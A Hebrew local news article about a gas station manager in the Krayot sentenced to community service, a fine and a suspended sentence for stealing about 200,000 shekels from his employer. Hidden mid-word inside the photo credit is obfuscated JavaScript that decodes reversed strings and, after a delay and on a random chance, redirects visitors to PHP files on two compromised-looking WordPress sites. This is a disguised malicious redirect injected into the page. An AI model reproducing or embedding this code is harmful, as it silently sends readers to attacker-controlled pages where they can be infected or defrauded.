fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

גנב מאות אלפי שקלים ממעסיקו וירצה עבודות שירות

מנהל תחנת דלק, שהואשם בגניבת כ-200 אלף שקלים מקופת התחנה, לא ירצה מאסר בפועל. השופט התחשב בחרטה שהביע ובהיעדר עבר פלילי
צילום אילוסטרציה: shutterstock
צילום אילוסטרציה: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

בית משפט השלום קריות גזר עונש של תשעה חודשי עבודות שירות על מנהל תחנת דלק בקריות, אשר הורשע בגניבה של לפחות 200 אלף שקלים מקופת התחנה.

נגד הנאשם, 32, הוגש כתב אישום שבו נטען כי במשך כשנה וחצי, בעת ששימש מנהל תחנת דלק בקריות, במספר רב של פעמים, לקח כסף מקופת התחנה בסכום כולל של לפחות 200 אלף שקלים. הוא הודה והורשע בעבירה של גניבה בידי עובד במסגרת הסדר טיעון.

בזמן הטיעונים לעונש ביקשה הפרקליטות להטיל על הנאשם עונש מאסר בפועל. הפרקליטות טענה, כי העבירה שביצע הנאשם פוגעת בערכים המוגנים של הגנה על קניינו של הפרט וכן של הגנה על יחסי אמון שבין עובד למעסיקו.

עו"ד תומר נווה, שייצג את הנאשם, טען שעונש מאסר בפועל עלול לדרדר את הנאשם לדרך עבריינית. הוא ציין כי עצם ניהול ההליך ההמשפטי כבר הביא אותו למצב של משבר כלכלי ונפשי עמוק. הנאשם קיבל אחריות על מעשיו, הביע חרטה וגם החזיר את הכסף שגנב.

עו"ד תומר נווה | צילום: יח"צ
עו"ד תומר נווה | צילום: יח"צ

בפני השופט, סגן הנשיא, יוסי טורס, הוצג תסקיר של שירות המבחן, שציין כי סיכויי השיקום של הנאשם גבוהים והתייחס גם להיעדר עבר פלילי ולחרטה הכנה שהביע על מעשיו עם לקיחת אחריות.

השופט קבע בגזר הדין: "נתונים אלו תומכים בהימנעות מענישה הכוללת כליאה. מסקנה זו מתחדדת לאור ההכרה ההולכת וגוברת בדבר ההשפעות השליליות של עונש מאסר בכליאה, לרבות הטמעת ערכים עברייניים".

מלבד עבודות השירות הוטל על הנאשם קנס של 8000 שקלים ועונש מאסר על תנאי.

 

לחדשות נוספות הקליקו כאן * לדף הפייסבוק שלנו הקליקו כאן 

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות